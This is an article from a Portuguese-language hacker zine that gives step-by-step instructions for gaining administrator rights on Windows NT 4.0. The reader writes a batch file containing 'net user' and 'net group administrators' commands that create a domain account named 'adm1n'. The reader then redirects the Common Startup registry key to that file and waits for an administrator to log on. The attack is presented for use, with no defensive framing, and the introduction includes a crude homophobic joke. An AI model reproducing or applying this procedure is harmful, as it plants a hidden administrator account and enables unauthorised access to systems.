|
Meu primeiro
texto pra f3. Logo no primeiro, jah falarei sobre o rWindows NT 4,
do qual sou anti. Agradeco a CRDS Hacking por me dar esse espacinho.
Como adoro escrever e pah.
Sei que 1% de quem pegar
o zine, vai ler o texto acima.
Entao pros gay maos na cobra.
pros mano. Maos a obra.
No texto abaixo vamos falar
sobre o Windows NT 4, que tem muito bug, que com
o tempo eu vou falando sobre os mesmos para os leitores da f3.
BORALAH!
¿
³ Explorando O Problema Do Folder Dos Usuarios No Windows Nt 4.0
³
¿
³Eh... eu vou diretamente falando oque fazer. ³
³ ³
³ ³
³1 ³
³ Crie um arquivo batch (c:\hacked) contendo os seguintes comandos:
³
³ ³
³--------------------inicio-------------------- ³
³ ³
³net user adm1n /add /domain ³
³net group administrators adm1n /add /domain ³
³ ³
³---------------------fim---------------------- ³
³ ³
³2 ³
³ Altere o registro ³
³HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
³
³User Shell Folders\Common Startup ³
³ ³
³(entre pelo regedit, e va encontrando estas pastas no lado direito.
ateh ³
³ chegar a Common Startup e poder mudar o valor. Para modificar o
valor, ³
³ simplesmente clique com o botao direito e vah em modificar.) ³
³ ³
³Coloque "c:\hacked" como valor. ³
³ ³
³ ³
³3) Aguarde um administrador logar e obtenha acesso administrativo
na maquina³
³atraves da recem-criada conta "adm1n" que voce deve ter
notado acima. ³
³ ³
³E tcharam! ³
³ ³
³Seja feliz. ³
³ ³
|